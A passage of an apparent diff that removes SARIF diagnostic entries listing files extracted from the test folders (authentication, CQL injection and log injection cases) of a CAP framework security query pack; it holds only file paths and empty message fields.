- } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 51 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 52 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 53 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 54 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 55 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", - "uriBaseId" : "%SRCROOT%", - "index" : 56 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 57 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 58 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 59 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 60 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 61 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 62 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 63 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 64 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 65 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 66 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 67 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 68 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 69 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 70 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 71 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 72 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 73 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 74 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 75 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 76 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 77 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 78 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 79 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 80 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 81 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 82 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 83 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 84 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 85 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 86 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 87 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 88 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 89 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 90 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 91 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 92 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 93 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 94 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 95 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 96 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 97 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 98 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 99 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 100 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 102 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 104 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 105 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 107 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" 